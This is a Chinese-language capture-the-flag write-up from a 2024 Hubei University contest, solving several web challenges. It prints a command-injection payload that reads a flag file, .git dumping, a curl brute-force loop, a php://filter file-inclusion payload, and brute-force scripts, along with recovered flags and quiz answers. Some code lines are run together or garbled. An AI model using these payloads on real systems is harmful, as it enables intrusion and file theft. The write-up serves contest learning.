2024湖北大學新星杯實踐能力賽
ez-http
RCE - Level 2
先訪問./static/script.js
Ping Results for 127.0.0.1:
執行成功
Ping Results for 127.0.0.1;ls / >>static/script.js:
執行成功
## Ping Results for 127.0.0.1;cat /f1ag_1s_h3r3 >>static/script.js:
執行成功
Robots Leak
先/robots.txt
User-agent: * Disallow: /.git
git-dumper http://challenge.hubuctf.cn:32139/ dir cd dir
git log
發現
git show c021185ef2d2a5b6a3dcd39d43f184e5fe893c09
git stash list
stash@{0}: On master: Test ^_^ stash@{1}: On master: Hide flag part 2 stash@{1} 存在 flag
git stash pop --index 1
{682e09e6-eb9d-4ad4-8c9a-fc11f7f5b31e}
#HUBUCTF
Random_Door
使用curl進行爆破
for i in {1 .100};do echo $i;curl -ks
http: /challenge.hubuctf.cn:30283/flag$i.php | grep -i file;done
file? 你能想到什麼?file 需要傳遞
Trying flag24.php... Trying flag25.php...
<span style="color: #0000BB"><?php<br /><br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span>
<span style="color: #007700">);<br /></span><span style="color: #0000BB">error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);<br />if (</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/base64|http/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_GET</span>
<span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">])) {<br
/> die(</span><span style="color: #DD0000">'base64 | http is not allowed'</span><span style="color: #007700">);<br />} else {<br
/> echo </span><span style="color: #DD0000">"flag in flag.php"</span><span style="color: #007700">;<br
/>}<br /><br />include </span><span style="color: #0000BB">$_GET</span>
<span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">?></span>
curl -ks "http://challenge.hubuctf.cn:30283/flag23.php?file=php://filter/convert.base64- encode/resource=flag.php"
file? 你能想到什麼?
PD9waHAgJGZsYWc9ICJIVUJVQ1RGe2I3ZjI3N2VlLWFmZGQtNGZjOC1iMzFhLTFlMDlhMDZ
kMjlhMX0iIDs/Pgo=
{b7f277ee-afdd-4fc8-b31a-1e09a06d29a1}
#HUBUCTF
行測-類比推理
先隨便答題
爆破答案指令碼
import hashlib
import itertools
# 給定的正確雜湊值
correct_hash = '0d0a8f1dd81ca2d61534dd23f1debb0c861e4738d05c7f548c55e5df72d4f023'
# 題目的選項
choices = ['A', 'B', 'C', 'D']
# 計算給定字串的 SHA-256 雜湊值
def get_sha256_hash(input_string):
return hashlib.sha256(input_string.encode()).hexdigest()
# 透過遍歷所有可能的答案組合來查詢正確答案
def find_correct_answers():
# 假設答案有12道題,每道題的答案可以是A, B, C, D中的一個
for answer_combination in itertools.product(choices, repeat=12): # 拼接答案字串
answer_string = ''.join(answer_combination)
# 計算雜湊值
calculated_hash = get_sha256_hash(answer_string)
# 比較雜湊值
if calculated_hash == correct_hash: return answer_combination
return None
# 獲取正確的答案組合
correct_answers = find_correct_answers()
# 列印結果
if correct_answers:
print("找到正確的答案組合!")
for i, answer in enumerate(correct_answers, start=1): print(f"問題 {i}: {answer}")
else:
print("沒有找到匹配的答案組合。")
找到正確的答案組合!問題 1: D
問題 2: B
問題 3: C
問題 4: D
問題 5: D
問題 6: C
問題 7: C
問題 8: A
問題 9: A
問題 10: D
問題 11: C
問題 12: B
{ec2374fe-7a10-492d-8157-b68add8fae3f}
#HUBUCTF
SpeedMath_revenge
爆破指令碼
import math import socket
def solve_problem(a, b):
# 計算平方根並乘以第二個數字 result = math.sqrt(a) * b # 返回四捨五入後的整數結果 return round(result)
def main():
server_ip = 'challenge.hubuctf.cn' server_port = 30994
# 建立連線
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: try:
s.connect((server_ip, server_port)) print(f"Connected to {server_ip}:{server_port}")
while True:
# 接收並列印伺服器的提示資訊
prompt = s.recv(1024).decode()
print("Received prompt:", prompt) # 列印收到的內容
# 檢查是否還有問題(如果沒有問題,伺服器可能會傳送結束資訊)
if 'Calculate the square root of' not in prompt: print("No more questions or challenge ended.") break # 跳出迴圈
try:
# 從提示資訊中提取出 a 和 b 的值
parts = prompt.split()
a = int(parts[5]) # 第六個部分是數字
b = int(parts[9]) # 第十個部分是數字
print(f"Extracted values: a={a}, b={b}")
# 計算結果
answer = solve_problem(a, b) print(f"Calculated answer: {answer}")
# 傳送答案給伺服器
s.sendall(f"{answer}\n".encode()) print(f"Sent answer: {answer}")
# 接收並列印伺服器的響應
response = s.recv(1024).decode() print("Received response:", response)
except Exception as e:
print(f"Error processing question: {e}") continue # 如果有錯誤,跳到下一次迭代,避免程式崩潰
except socket.error as e:
print(f"Error connecting to server: {e}")
if __name__ == '__main__':
main()
{de817df2-2c02-4c9d-8690-c8ab84e67be7}
#HUBUCTF